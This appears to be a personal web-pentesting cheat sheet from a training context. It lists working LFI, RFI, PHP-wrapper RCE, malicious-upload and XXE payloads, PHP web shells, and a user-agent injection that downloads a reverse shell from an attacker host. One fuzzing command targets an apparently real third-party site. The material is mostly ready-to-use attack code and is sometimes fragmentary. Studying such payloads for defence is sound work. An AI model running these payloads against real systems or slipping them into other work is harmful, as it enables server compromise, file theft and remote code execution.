RCE

Our goal is to make server execute a choosen code that will allow us to connect to it or execute a system command.

To check for PHP configurations at /etc/php/X.Y/apache2/php.ini for Apache and /etc/php/X.Y/fpm/php.ini for Nginx.

// check for allow_url_include
curl "http://hort:port/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
or decode in base64 decoder and search for allow_url_include
allow_url_include = On

RCE with allow-url_include On:

Data Wrapper method:

Payload:data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

Input method:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://host:port/index.php?language=php://input&cmd=id" | grep uid
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Expect method:
Grep for expect after finding out php.ini source code

extension=expect

curl -s "http://host:port/index.php?language=expect://id"

// LFI
Fuzz for parameters:
ffuf -w /home/user/HTB/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'https://blog.coinhako.com/ghost/api/content?FUZZ=value'

Basic LFI:
 /index.php?language=/etc/passwd Basic LFI
 /index.php?language=../../../../etc/passwd LFI with path traversal
 /index.php?language=/../../../etc/passwd LFI with name prefix
 /index.php?language=./languages/../../../../etc/passwd LFI with approved path

 LFI Bypasses
 /index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter
 /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding
 /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete)
 /index.php?language=../../../../etc/passwd%00 
 /index.php?language=php://filter/read=convert.base64-encode/resource=config Read PHP with base64 filter

RCE:

 PHP Wrappers
 /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id RCE with data wrapper

 curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" RCE with input wrapper
 curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id" RCE with expect wrapper
 
RFI
 echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT> Host web shell
 /index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id include php remote web shell.

 LFI + Upload
 echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif Create malicious image
 /index.php?language=./profile_images/shell.gif&cmd=id RCE with malicious uploaded image
 echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php - create malicious zip archive as 'jpg'
 /index.php?language=zip://shell.zip%23shell.php&cmd=id RCE with malicious uploaded zip

 php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg Create malicious phar 'as jpg'

 /index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id RCE with malicious uploaded phar

// SVG image upload with XXE

Content-Type:	image/svg+xml

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM
"php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>

// normal code upload
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' j4ckie.jpg

// XXE via upload
###### passwd ######
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
###### php files ######
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

// proc self environment method

inject into user agent
<?system('wget http://[attack machine]/reverseshell.txt -O shell.php');?>



https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi
https://exploit-notes.hdks.org/exploit/web/security-risk/blind-xxe/
https://j4ckie0x17.gitbook.io/notes-pentesting/pentesting-web/file-upload
https://github.com/Ferdibrgl/HTB-certifiedCBBH
https://github.com/m4riio21/HTB-Academy-Cheatsheets/blob/main/password-attacks.md
https://github.com/IgorSasovets/web-security-learning-resources/tree/main/Cheat_sheets
https://github.com/thenurhabib/wphunter/blob/main/attack.sh
https://blog.certcube.com/detailed-cheatsheet-lfi-rce-webshells/

SSL pinning (not relevant)
http://web.archive.org/web/20230726062819/https://antibot.blog/post/f71caae6874c077c9564204c36f73ddf/
http://www.thetower.org/article/inside-the-idfs-super-secret-elite-brain-trust-talpiot/


expect://id"

https://yunolay.github.io/yunolay_web_cheatsheet/overview.html
https://ytnuobgub.gitbook.io/redteam/htb-academy-web-modules-for-cbbh

// command injections
<?php
if (isset($_GET['filename'])) {
    system("touch /tmp/" . $_GET['filename'] . ".pdf");
}
?>
Perhaps a particular web application has a functionality that allows users 
to create a new .pdf document that gets created in the /tmp directory 
with a file name supplied by the user and may then be used by the 
web application for document processing purposes. 
However, as the user input from the filename parameter in the 
GET request is used directly with the touch command 
(without being sanitized or escaped first), the web application 
becomes vulnerable to OS command injection. This flaw can be exploited to 
execute arbitrary system commands on the back-end server.

Encoding payload
selecting the payload and then clicking [CTRL + U]. 
Finally, we can click Send to send our HTTP request:

if don't have colloborator use
webhook.site


SSTI (Server Side Template Injection)
Load template payloads in Burp Intruder

try and determine what template engine it could be... (Twig, Smarty...)

https://labs.sysre.ptlabs.sysre.pt

Previoussqli blind NextTest recon skills

Last updated 1 year ago